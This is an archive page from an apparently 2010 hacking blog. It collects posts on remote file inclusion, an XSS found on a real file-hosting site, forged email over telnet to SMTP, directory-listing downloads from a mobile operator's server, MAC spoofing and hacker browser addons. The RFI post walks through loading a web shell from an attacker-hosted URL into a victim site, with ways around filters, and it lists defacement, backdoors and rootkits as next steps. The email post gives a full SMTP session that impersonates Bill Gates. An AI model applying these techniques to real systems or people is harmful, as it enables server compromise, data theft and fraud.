Showing posts with label hacking. Show all posts
Showing posts with label hacking. Show all posts
Wednesday 15 September 2010
Nepali Hack Challenge Site
I had to develop a reversing challenge site for KU IT Meet 2010 organized by Kathmandu University Computer Club in IT Park, Panauti Road. The challenge was done by few great hackers from Nepal like fr3ak, dpac_, etc. and they finished around 90% of the challenges. But other users were far behind in the challenge so now I want to make this challenge open for everyone.
If you want to participate in the Reversing challenge, you can visit www.nepali.netau.net. The site is pretty basic in its interface and design as it had to be done very quickly. But still this site might prove useful for some of you to learn hacking as the challenges in the site will guide you to read the related hacking and security articles by searching on your own on google. So I hope you will have fun doing these challenges.
Click to visit the site
If you need any sort of help regarding the challenges, you can always contact me. Best of luck for the challenges.
Read more...
If you want to participate in the Reversing challenge, you can visit www.nepali.netau.net. The site is pretty basic in its interface and design as it had to be done very quickly. But still this site might prove useful for some of you to learn hacking as the challenges in the site will guide you to read the related hacking and security articles by searching on your own on google. So I hope you will have fun doing these challenges.
Click to visit the site
If you need any sort of help regarding the challenges, you can always contact me. Best of luck for the challenges.
Read more...
Bookmark this post: | 
|
Sunday 12 September 2010
Ziddu.com Vulnerable to XSS
Today, I was trying to download some file from ziddu and since the author had already deleted the file, I was redirected to the error message page. And I thought of playing around with the message from GET params which was being displayed into the page.
I first added <i> and </i> in between the message and found that the HTML tags were not being filtered. Then I used the <script> tag and tried to do the alert but they were adding backslashes in the single and double quotes...
Then I used the String.fromCharCode() JS function and the alert appeared in the site..
Ziddu.com suffers from the XSS and I've notified them.
Read more...
I first added <i> and </i> in between the message and found that the HTML tags were not being filtered. Then I used the <script> tag and tried to do the alert but they were adding backslashes in the single and double quotes...
Then I used the String.fromCharCode() JS function and the alert appeared in the site..
http://www.ziddu.com/errortracking.php?msg=%3Cscript%3Ealert%28String.fromCharCode%2883,65,77,65,82%29%29;%3C/script%3E
Ziddu.com suffers from the XSS and I've notified them.
Read more...
Bookmark this post: |
|
Monday 6 September 2010
Steal your buddy's MSN display pic
I don't know how well this works but it worked well for me... Extra note that I'm using msgplus addon on my windows live so I am not sure about the native Windows live messenger. Anyway I thought it would be worth sharing here.
I was actually looking for the malware that apparently was running from the temporary folder of my computer. So I went to the temporary folder by typing
There I found the folder MessengerCache and then to kill my curiosity, I browsed inside the folder and found some files with their name in base64 encoded format(probably) like:
I then opened one of these files in notepad++ and found the starting of the file containing
which is something like header for the GIF images. Immediately I renamed the file into .gif and when I viewed it, I found it to be display pic of one of the friends in my buddy list. I hope you got me... This is something like stealing buddy's display pic. Have fun. :)
Read more...
I was actually looking for the malware that apparently was running from the temporary folder of my computer. So I went to the temporary folder by typing
%temp%
There I found the folder MessengerCache and then to kill my curiosity, I browsed inside the folder and found some files with their name in base64 encoded format(probably) like:
5MUxRvUiwvrxjV2LPv16yrBUhKs=
fffaxlzPZXqjTQMBjaQqrIhOQtc=
RMsNq5KjYXJA2LKOCzpJX2FY4Wzo=
etc...
fffaxlzPZXqjTQMBjaQqrIhOQtc=
RMsNq5KjYXJA2LKOCzpJX2FY4Wzo=
etc...
I then opened one of these files in notepad++ and found the starting of the file containing
GIF89a
which is something like header for the GIF images. Immediately I renamed the file into .gif and when I viewed it, I found it to be display pic of one of the friends in my buddy list. I hope you got me... This is something like stealing buddy's display pic. Have fun. :)
Read more...
Bookmark this post: |
|
Sunday 29 August 2010
Basic on Remote File Inclusion[RFI]
This time, I am going to give you information about the remote file inclusion vulnerability in the webpages which can be compromised to root and mass the server.
First, let me say what remote file inclusion(RFI) is... File inclusion vulnerability is the result of poor & insecure programming practice which allows us to include the files in the website's php scripts. Now, whenever I say remote file inclusion, the file that is going to be included is from different server. Simple, you would include some evil file with malicious code from another server in the victim site you are hacking. Such evil file is called shell and should be in .txt format so as to get executed in the victim site. There are numerous shells available on the internet. Google for r57 or c99 shell and you should get the shells. Now you need to upload these shells to the server(free hosting providers) with .txt extension.
Let me suppose, I am browsing a site www.victim.com & notice in the URL(in address bar) that one of the GET arguments is index.php?page=home.php. I click on the link & it changes to index.php?page=game.php
Example:
Let me show you the code for index.php that makes it vulnerable to RFI.
So, the code sets $mypage to $_GET['page'] & whenever we go to http://www.victim.com/index.php?page=game.php, game.php file is included by include() function i.e. the content of blog.php is pasted into index.php
But this allows malicious attacker to include remote files also. I mean, if you put:
you will see the content of your site on the site.
Now you got the idea of remote file inclusion, its time to exploit it. So we use evil scripts called shells which provide us the interface of viewing, deleting & editing files, getting server info & much more.
Say, I've uploaded my shell in free hosting provider & the URL(location) of my shell is http://www.hacky0u.free.com/lol.txt, I would do:
Now, with this I get shell on the server & can do anything from deleting files to stealing the informations from there.
But sometimes, programmers write codes like below:
So if we have index.php?page=game, the game.php file is getting included. So this seems to include only php files & our .txt shell file won't get included instead it would include .txt.php making us fail. But, if we add "?" this gets bypassed & we can still gain shell. Similarly, if ? doesn't work, you can injection nullbyte() in place of ? that denotes end of the string.
After getting shell, we may delete files, do mass defacements, gain root access using root exploits, keep backdoors, install r00tkits,etc. & etc. Seems elite but you can learn all these things.
Now, something about avoiding RFI... If you are a web programmer, the you should know the switch-case-default statement. Use it for the navigation to the pages instead of above shown scripts. Switch is simple yet the best solution.
Learn it, hack it & enjoy it...
Read more...
First, let me say what remote file inclusion(RFI) is... File inclusion vulnerability is the result of poor & insecure programming practice which allows us to include the files in the website's php scripts. Now, whenever I say remote file inclusion, the file that is going to be included is from different server. Simple, you would include some evil file with malicious code from another server in the victim site you are hacking. Such evil file is called shell and should be in .txt format so as to get executed in the victim site. There are numerous shells available on the internet. Google for r57 or c99 shell and you should get the shells. Now you need to upload these shells to the server(free hosting providers) with .txt extension.
Let me suppose, I am browsing a site www.victim.com & notice in the URL(in address bar) that one of the GET arguments is index.php?page=home.php. I click on the link & it changes to index.php?page=game.php
Example:
http://www.victim.com/index.php?page=home.php
http://www.victim.com/index.php?page=game.php
http://www.victim.com/index.php?page=game.php
Let me show you the code for index.php that makes it vulnerable to RFI.
<?php
$mypage=$_GET['page'];
include($mypage);
?>
$mypage=$_GET['page'];
include($mypage);
?>
So, the code sets $mypage to $_GET['page'] & whenever we go to http://www.victim.com/index.php?page=game.php, game.php file is included by include() function i.e. the content of blog.php is pasted into index.php
But this allows malicious attacker to include remote files also. I mean, if you put:
http://www.victim.com/index.php?page=http://www.yoursite.com
you will see the content of your site on the site.
Now you got the idea of remote file inclusion, its time to exploit it. So we use evil scripts called shells which provide us the interface of viewing, deleting & editing files, getting server info & much more.
Say, I've uploaded my shell in free hosting provider & the URL(location) of my shell is http://www.hacky0u.free.com/lol.txt, I would do:
http://www.victim.com/index.php?page=http://www.hacky0u.free.com/lol.txt
Now, with this I get shell on the server & can do anything from deleting files to stealing the informations from there.
But sometimes, programmers write codes like below:
<?php
$mypage=$_GET['page'];
include($mypage.".php");
?>
$mypage=$_GET['page'];
include($mypage.".php");
?>
So if we have index.php?page=game, the game.php file is getting included. So this seems to include only php files & our .txt shell file won't get included instead it would include .txt.php making us fail. But, if we add "?" this gets bypassed & we can still gain shell. Similarly, if ? doesn't work, you can injection nullbyte() in place of ? that denotes end of the string.
Example: http://www.victim.com/index.php?page=http://www.hacky0u.free.com/lol.txt?
After getting shell, we may delete files, do mass defacements, gain root access using root exploits, keep backdoors, install r00tkits,etc. & etc. Seems elite but you can learn all these things.
Now, something about avoiding RFI... If you are a web programmer, the you should know the switch-case-default statement. Use it for the navigation to the pages instead of above shown scripts. Switch is simple yet the best solution.
Learn it, hack it & enjoy it...
Read more...
Bookmark this post: |
|
Download Spicenepal/Ncell PRBT tones
I was just browsing the site of mero mobile (www.spicenepal.com) quite a long ago and was checking the caller ring back tones. Though its not any kind of hack, if you guys love some wav tones of the site and want to download the ring back tones, I have come up with the solution for you.
First navigate to:
Now you will see some page that shows "forbidden" and etc. Anyway, now navigate to:
You will get directory listing. Now go to each folder and download the wav tones for you.
Some sample links are:
You will get list of wav files, listen to them and download them.
I am sorry if there already exists the download link in the site but if not, this might help you. Hope this helps some of you guys out there.
Thanks.
Read more...
First navigate to:
Now you will see some page that shows "forbidden" and etc. Anyway, now navigate to:
You will get directory listing. Now go to each folder and download the wav tones for you.
Some sample links are:
http://prbt.spicenepal.com:9998/colorring/al/600/001/0/0000/0001/
http://prbt.spicenepal.com:9998/colorring/al/600/001/0/0000/0000/
http://prbt.spicenepal.com:9998/colorring/rl/600/001/0/0000/0000/
http://prbt.spicenepal.com:9998/colorring/rl/600/001/0/0000/0001/
http://prbt.spicenepal.com:9998/colorring/al/600/001/0/0000/0000/
http://prbt.spicenepal.com:9998/colorring/rl/600/001/0/0000/0000/
http://prbt.spicenepal.com:9998/colorring/rl/600/001/0/0000/0001/
You will get list of wav files, listen to them and download them.
I am sorry if there already exists the download link in the site but if not, this might help you. Hope this helps some of you guys out there.
Thanks.
Read more...
Bookmark this post: |
|
Changing MAC address in LINUX
Previously I had posted on Changing MAC address in Windows but what if you want to change the MAC address in your LINUX distro. As I've said in the previous post, MAC spoofing can be great for the network with MAC-based restrictions.
There's a utility called ifconfig in LINUX which can be used to view and configure the network interfaces in your LINUX distro. The following shows how you can view your MAC address of the interface and then how you can modify the MAC.
Next, enter the following commands in your linux by logging in as the root user.
Now you can view your changed MAC by again entering the command:
This is how you can use ifconfig command to configure MAC for your interface(eth0 in this case). But there exists a tool called GNU MAC Changer which can be used for viewing and manipulating the MAC address of network interfaces. You can download this utility from HERE. This page also lists the proper instructions for using the utility.
I hope you find this post useful.
Read more...
There's a utility called ifconfig in LINUX which can be used to view and configure the network interfaces in your LINUX distro. The following shows how you can view your MAC address of the interface and then how you can modify the MAC.
ifconfig -a | grep HWaddr
# This will display the hardware address i.e. MAC of your machine.
# This will display the hardware address i.e. MAC of your machine.
Next, enter the following commands in your linux by logging in as the root user.
ifconfig eth0 down
ifconfig eth0 hw ether 00:1E:90:E9:77:D7
ifconfig eth0 up
# This will change the hardware address i.e. MAC of your machine.
ifconfig eth0 hw ether 00:1E:90:E9:77:D7
ifconfig eth0 up
# This will change the hardware address i.e. MAC of your machine.
Now you can view your changed MAC by again entering the command:
ifconfig -a | grep HWaddr
# This will display the hardware address i.e. MAC of your machine.
# This will display the hardware address i.e. MAC of your machine.
This is how you can use ifconfig command to configure MAC for your interface(eth0 in this case). But there exists a tool called GNU MAC Changer which can be used for viewing and manipulating the MAC address of network interfaces. You can download this utility from HERE. This page also lists the proper instructions for using the utility.
I hope you find this post useful.
Read more...
Bookmark this post: |
|
Saturday 28 August 2010
Blind SQL Injection video
Previously I had posted a video tutorial on Basic SQL injection, that presented the basic of SQL injection in the mysql backed php web applications. This time, I've uploaded one of my old videos and that's on blind sql injection.
Blind SQL Injection Video Tutorial
Be sure to comment on this tutorial.
Read more...
Blind SQL Injection Video Tutorial
Be sure to comment on this tutorial.
Read more...
Bookmark this post: |
|
Tuesday 24 August 2010
Basic SQL injection video by Me
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.
I had made a simple video demonstrating the basic of SQL injection attacks in my own localhost and now I've uploaded it for you.
Basic SQL Injection Video By Sam207
Enjoy. I'll be uploading other videos by me.
Read more...
I had made a simple video demonstrating the basic of SQL injection attacks in my own localhost and now I've uploaded it for you.
Basic SQL Injection Video By Sam207
Enjoy. I'll be uploading other videos by me.
Read more...
Bookmark this post: |
|
Monday 23 August 2010
Spoofing your MAC address in Windows
A Media Access Control address (MAC address) is a unique identifier assigned to network adapters or network interface cards (NICs) usually by the manufacturer for identification. It may also be known as an Ethernet Hardware Address (EHA), hardware address, adapter address, or physical address. In many networks, the mac address based filtering is applied and this can be easily bypassed by spoofing the MAC address.
To spoof the MAC address of your PC in wireless or wired LAN, you can use the software called MACMakeUp
Download it HERE
To find your original MAC address, just type ipconfig /all and you will see the physical address of 6 hex pairs. In order to spoof the MAC address, enter the new MAC address after running the Mac Makeup program.
Read more...
To spoof the MAC address of your PC in wireless or wired LAN, you can use the software called MACMakeUp
Download it HERE
To find your original MAC address, just type ipconfig /all and you will see the physical address of 6 hex pairs. In order to spoof the MAC address, enter the new MAC address after running the Mac Makeup program.
Read more...
Bookmark this post: |
|
Saturday 21 August 2010
Sending Fake Emails Using Telnet to SMTP Server
In this tutorial I am going to show you how to send fake emails by telnetting the mail server. We will be using telnet client(which comes along with windows) & u should know about telnet.. For knowing more about the telnet, please use the google(or I may write a tut on it).
Sending the forged emails is very easy for which we will be connecting to the remote mail server & use the function of mail daemon running in the remote host to send the fake mails.
First open the command prompt & type 'telnet' (without quotes), then hit enter.. U will be welcomed by the Microsoft Telnet.. Now we have to connect the mail daemon through the specific port & the port should be having SMTP service on. Usually, the SMTP port is 25 but that may differ. I also find the port 26 & 587 used frequently for the SMTP service.. Below, I've made the parts we need to type as bold...
For my example, lets say, www.mailserver.com is providing SMTP mail service through the port 25.
First I connect to the mail server by issuing following command in telnet client.
o www.mailserver.com 25
This establishes remote connection with the port no 25 at mailserver.com
After successful connection, I am displayed with the SMTP infos..
Its always a good idea to ask help from the mail daemon. So first issue HELP to see the supported commands..
Then we introduce ourself to the mail daemon by issuing HELO command.. & after successful helo command, we input the sender email using 'mail from:' (widout quotes) command..
Then we enter the recipient's address using the 'rcpt to:' (widout quotes) command.
Now, we enter our actual data using the DATA command.. Within DATA, u can use SUBJECT: command to enter the subject of email..
Finally, we end our data by entering .(full stop) at the end. This sends the forged mail through that mail server..
now let me show a session of email forging from which u can be more clear.
First, I open command prompt & go to telnet client by typing telnet.. Below is the session:
Microsoft Telnet>o www.mailserver.com 25
220 mailserver.com ESMTP Sendmail Version 8.x.x; Mon, 28 Sept. 2008;
We do not allow to send fake or bulk emails...
helo microsoft.com
250 mailserver.com Hello Nice to meet you..
mail from:billgates@microsoft.com
250 billgates@microsoft.com Sender Ok
rcpt to:victim@victim.com
250 victim@victim.com Recipient Ok
data
354 Enter mail, end with "." on a line by itself..
SUBJECT:Hello!
Hello,
I am Bill Gates, the chairman of Microsoft. I would like to offer you a job for Microsoft Corporation. If you are interested to work with Microsoft, then reply me at my mail address.
Regards~
Bill Gates
.
250 2.0.0 iF3NDLS240106 Message Accepted For Delivery.
This was the session of sending the forged mail from billgates@microsoft.com to victim@victim.com
I hope u understood the log.. So this was my little tutorial on sending forged mails..
The art of sending forged mails can be extended to send file attachments & to use multiple recipients..
Read more...
Sending the forged emails is very easy for which we will be connecting to the remote mail server & use the function of mail daemon running in the remote host to send the fake mails.
First open the command prompt & type 'telnet' (without quotes), then hit enter.. U will be welcomed by the Microsoft Telnet.. Now we have to connect the mail daemon through the specific port & the port should be having SMTP service on. Usually, the SMTP port is 25 but that may differ. I also find the port 26 & 587 used frequently for the SMTP service.. Below, I've made the parts we need to type as bold...
For my example, lets say, www.mailserver.com is providing SMTP mail service through the port 25.
First I connect to the mail server by issuing following command in telnet client.
o www.mailserver.com 25
This establishes remote connection with the port no 25 at mailserver.com
After successful connection, I am displayed with the SMTP infos..
Its always a good idea to ask help from the mail daemon. So first issue HELP to see the supported commands..
Then we introduce ourself to the mail daemon by issuing HELO command.. & after successful helo command, we input the sender email using 'mail from:' (widout quotes) command..
Then we enter the recipient's address using the 'rcpt to:' (widout quotes) command.
Now, we enter our actual data using the DATA command.. Within DATA, u can use SUBJECT: command to enter the subject of email..
Finally, we end our data by entering .(full stop) at the end. This sends the forged mail through that mail server..
now let me show a session of email forging from which u can be more clear.
First, I open command prompt & go to telnet client by typing telnet.. Below is the session:
Microsoft Telnet>o www.mailserver.com 25
220 mailserver.com ESMTP Sendmail Version 8.x.x; Mon, 28 Sept. 2008;
We do not allow to send fake or bulk emails...
helo microsoft.com
250 mailserver.com Hello Nice to meet you..
mail from:billgates@microsoft.com
250 billgates@microsoft.com Sender Ok
rcpt to:victim@victim.com
250 victim@victim.com Recipient Ok
data
354 Enter mail, end with "." on a line by itself..
SUBJECT:Hello!
Hello,
I am Bill Gates, the chairman of Microsoft. I would like to offer you a job for Microsoft Corporation. If you are interested to work with Microsoft, then reply me at my mail address.
Regards~
Bill Gates
.
250 2.0.0 iF3NDLS240106 Message Accepted For Delivery.
This was the session of sending the forged mail from billgates@microsoft.com to victim@victim.com
I hope u understood the log.. So this was my little tutorial on sending forged mails..
The art of sending forged mails can be extended to send file attachments & to use multiple recipients..
Read more...
Bookmark this post: |
|
Some Useful Mozilla Addons For Hackers
Hi there, this time I am going to inform about some of the useful plugins available for mozilla firefox... Mozilla Firefox is a very good browser and it has got tons of plugins that you can use to enhance its capabilities. Among them, I am going to provide you information about some of the useful plugins for web pen-testing and esp. useful for beginners.
User Agent Switcher: This plugin allows us to change user agent and provide fake information to the site. Visit http://www.chrispederick.com/work/user-agent-switcher/
Firebug: It says "Web Development Evolved" and is a very useful addon for web developers as well. Visit http://www.getfirebug.com/ for downloads and more
Greasemonkey: It is used to automate the manipulation of target websites with greasemonkey scripts. A great site for the Greasemonkey scripts is http://userscripts.org
RefControl: It is an extension used to modify and send different HTTP referrer to the sites... Visit http://www.stardrifter.org/refcontrol
Hackbar: Useful plugin with various options for hexing, injection, xss, etc...
More plugins that I love will be explained in another post. Stay tuned...
Read more...
User Agent Switcher: This plugin allows us to change user agent and provide fake information to the site. Visit http://www.chrispederick.com/work/user-agent-switcher/
Firebug: It says "Web Development Evolved" and is a very useful addon for web developers as well. Visit http://www.getfirebug.com/ for downloads and more
Greasemonkey: It is used to automate the manipulation of target websites with greasemonkey scripts. A great site for the Greasemonkey scripts is http://userscripts.org
RefControl: It is an extension used to modify and send different HTTP referrer to the sites... Visit http://www.stardrifter.org/refcontrol
Hackbar: Useful plugin with various options for hexing, injection, xss, etc...
Read more...
Bookmark this post: |
|
Subscribe to:
Posts (Atom)